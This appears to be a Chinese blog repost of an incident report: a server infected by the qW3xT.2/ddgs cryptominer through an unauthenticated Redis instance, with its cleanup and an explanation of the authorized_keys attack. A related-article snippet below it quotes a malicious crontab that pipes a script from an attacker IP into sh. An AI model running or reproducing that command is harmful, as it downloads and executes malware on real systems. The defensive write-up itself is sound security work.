服务器被矿机程序攻击

最新推荐文章于 2025-08-15 10:38:51 发布
最新推荐文章于 2025-08-15 10:38:51 发布
阅读量200 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: 数据库 运维
原文链接:https://yq.aliyun.com/articles/632628
本文记录了一次云服务器遭受挖矿病毒入侵的事件,详细描述了从发现高CPU使用率报警,到定位挖矿程序,再到清除病毒的全过程。同时,深入分析了病毒入侵的原因,即Redis服务未设置密码验证,导致攻击者利用Redis未授权登录漏洞获取系统控制权。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

事件经过

今天早上7:00,收到腾讯云监控发来基础监控告警:某台服务器的CPU利用率为100%。SSH登录到服务器正常,说明root密码还没有被更改,我最初怀疑有可能是DDos攻击。

执行top命令:

image.png

发现有个名为qW3xT.2的程序CPU占用高达397.3%,服务器为4核8G,那就基本上把所有CPU资源占了,也就是腾讯云发来的CPU使用率大于99%。

Google搜索第一条显示这是一个矿机程序。

image.png

那就是说明云服务器被矿机程序破解了。

  • 切换到/tmp目录:
image.png

有两个可执行程序ddgs.3013和qW3xT.2

  • 查看定时任务:
image.png

解决方案

1,删掉/tmp下的ddgs.3013和qW3xT.2

2.,删掉cron任务

原因

云服务器上近期搭建了一个redis服务,没采用密码验证,挖矿程序就是通过Redis拿到了系统的控制权。

关于reidis 未授权登陆漏洞

漏洞概要

Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将Redis服务暴露到公网上,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据。攻击者在未授权访问Redis的情况下可以利用Redis的相关方法,可以成功将自己的公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件中,进而可以直接登录目标服务器。

漏洞描述

Redis 安全模型的观念是: “请不要将Redis暴露在公开网络中, 因为让不受信任的客户接触到Redis是非常危险的” 。

Redis 作者之所以放弃解决未授权访问导致的不安全性是因为, 99.99%使用Redis的场景都是在沙盒化的环境中, 为了0.01%的可能性增加安全规则的同时也增加了复杂性, 虽然这个问题的并不是不能解决的, 但是这在他的设计哲学中仍是不划算的。

因为其他受信任用户需要使用Redis或者因为运维人员的疏忽等原因,部分Redis 绑定在0.0.0.0:6379,并且没有开启认证(这是Redis的默认配置),如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip访问等,将会导致Redis服务直接暴露在公网上,导致其他用户可以直接在非授权情况下直接访问Redis服务并进行相关操作。

利用Redis自身的相关方法,可以进行写文件操作,攻击者可以成功将自己的公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys文件中,进而可以直接登录目标服务器。 (导致可以执行任何操作)

参考

https://wwxinjie.github.io/2018/06/15/linux-clean-mineral/

https://blog.youkuaiyun.com/whs_321/article/details/51734602

阿里云服务器被挖矿程序侵入问题
samfaker的博客
08-23 1581
gitlab漏洞引起的无文件、无定时任务的挖矿程序解决方法
服务器被黑客用来挖矿?怎么办?
JAVA88866的博客
05-14 2634
哈喽,大家好,我是老表~ 昨天下午一个朋友和我说,他的服务器被阿里云监测出来在挖矿,然后阿里云官方把服务器给关停了。 不用急,这个时候最简单的方法是在阿里云里提一个工单,反馈相关问题。 解禁服务器 要解决问题、排查删除挖矿程序,首先我们需要解禁服务器,登录阿里云官方平台后,依次点击控制台->个人头像->安全管控进入相关页面。 在处罚列表,我们可以看到相关处罚记录,点击解除封禁后即可正常进入服务器了。 会有提示,需要在解禁后三日内找到挖矿程序,并删除,否则官...
记录服务器矿机程序攻击解决过程
qq_25045173的博客
12-27 1914
问题描述: 前端时间买了阿里云服务器准备用来自己学习,装好必要软件准备部署服务愉快学习。结果第二天上午手机一直收到cup满负荷告警短信,查看服务器存在一个异常进程持续占用cup超过80%以上(该进程杀死之后会自动重启),怀疑被植入矿机程序,现将定位解决步骤总结如下。 解决步骤: 1:top命令查看cup占用最高进程(排序 查询可疑进程) 2:...
服务器被挖矿程序攻击解决办法
LuckyCurve的博客
02-27 2072
平平常常的一天,晚上在弄虚拟机的时候接收到了阿里云的云盾发来的消息,挖矿程序 以前从来没有碰到过这种事情,突然一下子有点懵了,也是对CentOS的操作指令不太熟悉,记录下处理过程,供参考 输入top指令,查看CPU的占用情况,一个名为kdevtmpfsi的进程CPU占用率99%!比我的nginx和tomcat服务器占用的CPU还高… 果断一顿骚操作,通过top指令获取到了pid,直接kill -...
yarn程序被劫持运行矿机程序
capetown的博客
12-20 897
记一次问题排查过程,希望对他人有借鉴作用,不喜请喷。 一、基本现象 Nodemanager进程挂掉 2、yarn日志 进入系统查看yarn日志 #cd /var/log/hadoop-yarn/yarn #less yarn-yarn-nodemanager-so81.novalocal.log 发现没有异常错误信息 3、系统负载 通过top 命令结合c  M 查看使用cpu...
《我的世界》Python编程入门(11) 开矿机案例
mighty13的专栏
12-21 1万+
复习 1.检测方块:getblock方法 格式:getblock(x坐标,y坐标,z坐标) 返回值:方块的id 方块的id到哪里去查? setblock(x坐标,y坐标,z坐标,方块id) 2.列表数据类型 (1)基础概念 两个关键符号[] , 列表是一种序列,也是集合,列表由多个元素组成,元素之间由,隔开,列表用[]表示。 (2)切片 列表同字符串一样支持切片,索引从0开始 切片格式[start:end:stp] 注意类比字符串、字典! (3)增删改查 增加元素:列表.append(新元素) 删除元素:d
阿里云服务器被入侵——redis挖矿
weixin_33947521的博客
05-02 231
1、起因: 发现运维平台上没有昨天计划任务相关的数据,登上服务器,才发现crontab被改了 [root@58 ~]# crontab -l */5 * * * * curl -fsSL http://218.248.40.228:9999/i.sh?6 | sh``` 2、处理过程: ①、停掉计划任务: [root@58 ~]# cronta...
针对 Linux SSH 服务器的新攻击:Supershell 恶意软件危害易受攻击的系统
网络研究观
09-22 687
该后门使攻击者能够远程控制受感染的系统。 初次感染后,黑客启动扫描仪来寻找其他易受攻击的目标。 据信这些攻击是使用从已受感染的服务器获取的密码字典进行的。
网络安全-攻击篇-攻击载体
qq_53439698的博客
01-06 2164
随着网络的安全事态不断演变、新的威胁不断出现,从而也萌生了形式多样的网络攻击手段。网络安全攻击是指针对计算机信息系统、基础设施、计算机网络或个人计算机设备的任何类型的进攻动作。这些攻击可能会破坏网络系统运行的安全、信息内容的安全、信息通信与传播安全,使计算机或网络系统中的数据被篡改、窃取或丢失,导致严重的安全后果。网络安全攻击通常由黑客或其他恶意行为者发起,他们利用各种技术手段和漏洞来实施攻击,以获得非法利益或造成损害。
记录一次服务器被拿去挖矿的经历
努力就有收获
10-20 2293
服务器被刷了? 最近阿里云总是提示各种风险,只是简单处理,没太在意。 今天想读取服务器的一个 静态文件,总是失败,偶尔成功一两次,连接阿里云服务器也总是挂,一度怀疑公司网络的问题,然后通过远程打包的时候也挂了一次,说明肯定是服务器有问题了。 回家发现是 Yapi 的一个漏洞导致会被挖矿,于是赶紧禁用 Yapi 的相关服务。 怀疑可能有残留文件,那就得好好查查。首先根据阿里云报警信息里面的文件路径排查,该删除的删除。 1. 排查到一例: 根据这个地址排查到,这是猫池,进而得到他的偷窃钱包地址。 猫池地址:h
记一次服务器被挖矿程序攻击解决
时光钟摆
08-13 2704
这两天先后收到阿里云的两条短信,一次提示有挖矿程序;一次提示服务器上的crontab被改了。中间隔了1天。刚开始我还没有引起注意,看到有挖矿程序的时候,用top查看到有mined的进程,就直接kill掉了,后来又遇到的时候,发现不对啊,有两个特别占cpu的进程,分别是qW3xT.2和ddgs.3013。确定是挖矿进程无疑了。   1.使用top查看占用cpu高的进程,发现qW3xT.2占用将近...
记一次Linux被入侵,服务器变“矿机”全过程
yeluoxiang的专栏
06-13 4818
“周一早上刚到办公室,就听到同事说有一台服务器登陆不上了,我也没放在心上,继续边吃早点,边看币价是不是又跌了。不一会运维的同事也到了,气喘吁吁的说:我们有台服务器被阿里云...
Beaglebone black 蚂蚁矿机L3+控制板 angstorm SSH 远程登录
u013443294的博客
04-15 1969
挖矿固件分为17年版本和19年版本,通过固件网页可以查看 17年版本的可直接通过SSH 远程登录 19年版本的由于安全考虑需要设置才可登录, 具体操作: 1、创建配置文件存放目录。 mkdir /etc/dropbear 2、生成配置文件及密钥对。 dropbearkey -t rsa -f /etc/dropbear/dropbear_rsa_host_key 3、启动服务,常用端口22 dropbear -p 22 4、使用远程登录工具登录 ...
吐血整理60个Redis面试题,全网最全了
11-20 3111
1.Redis 是一个基于内存的高性能key-value数据库。 2.Redis相比memcached有哪些优势: memcached所有的值均是简单的字符串,redis作为其替代者,支持更为丰富的数据类型 redis的速度比memcached快很多 redis可以持久化其数据 3.Redis是单线程 redis利用队列技术将并发访问变为串行访问,消除了传统数据库串行控制的开销 4.R...
记一次服务器被挖矿木马攻击的经历
热门推荐
点滴汇聚,智在积累。——Danny
01-07 2万+
背景 利用空余时间买了台服务器做了个小网站玩,今天访问了一下,加载巨慢,一看服务器运行情况,CPU飙到100%,按CPU消耗排序,排在第一的是一个名为“imWBR1”的进程,查了一下是一个挖矿木马,于是赶紧采取办法~ 清除恶意程序 首先比较直观的是imWBR1这个进程,查找它的位置在/tmp/目录下,如下图: (图2) 先删除/tmp/imWBR1,再kill掉imW
MoonBit Perals Vol.05: 函数式里的依赖注入:Reader Monad
m0_74743788的博客
08-13 1132
普通的函数就像一个流水线,你丢进去一袋面粉,然后直接跑到生产线末端,等着方便面出来。但这条流水线需要自动处理中间的所有复杂情况:没放面粉/“没有下单,期待发货”(null)面团含水量不够把压面机干卡了(抛出异常)配料机需要读取今天的生产配方,比如是红烧牛肉味还是香菇炖鸡味(读取外部配置)流水线末端的打包机需要记录今天打包了多少包(更新计数器)Monad 就是专门管理这条复杂流水线的“总控制系统”。它把你的数据和处理流程的上下文一起打包,确保整个流程能顺畅、安全地进行下去。
如何在 Linux 上安装 SQL Server 2022 和 Azure Data Studio
csdn_aspnet的专栏,请点击博客主页右上角三个点中的私信联系
08-15 572
本文介绍了如何在Linux系统(以Ubuntu 20.04为例)上安装SQL Server 2022及Azure Data Studio。SQL Server自2017版开始支持Linux平台,通过平台抽象层实现跨平台兼容性。文章详细说明了安装步骤:导入GPG密钥、注册存储库、安装软件包并配置管理员密码。同时介绍了SQL Server在Linux上的不同版本(企业版、标准版等)和主要功能差异。安装完成后,用户可通过Azure Data Studio等工具进行连接管理,文中提供了连接参数设置指南。整个过程简便
MySQL 常用命令速查表
最新发布
DeppBing的博客,全栈修炼记|记录一个开发者的进化轨迹
08-15 173
本文总结了MySQL常用SQL命令,涵盖数据库操作、表操作、数据操作、数据查询、权限控制、事务控制等核心功能。主要内容包括:数据库的创建/删除/修改(CREATE/DROP/ALTER DATABASE);表结构的创建/修改/删除(CREATE/ALTER/DROP TABLE);数据增删改查(INSERT/DELETE/UPDATE/SELECT);索引管理(CREATE/DROP INDEX);用户权限控制(GRANT/REVOKE);事务管理(START/COMMIT/ROLLBACK)等。每个命令都
cat本地部署
Chaser______的博客
08-15 286
CAT监控系统部署指南 环境准备:JDK1.8、Tomcat、MySQL 获取CAT包:通过Git克隆源码或下载官网war包 部署步骤: 创建/data目录结构并设置权限 配置client.xml、datasources.xml和server.xml 导入SQL文件创建数据库 将cat.war部署到Tomcat的webapps目录 启动服务:启动Tomcat后访问http://ip:8080/cat 注意事项:将配置文件中的127.0.0.1替换为实际IP地址 (98字)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值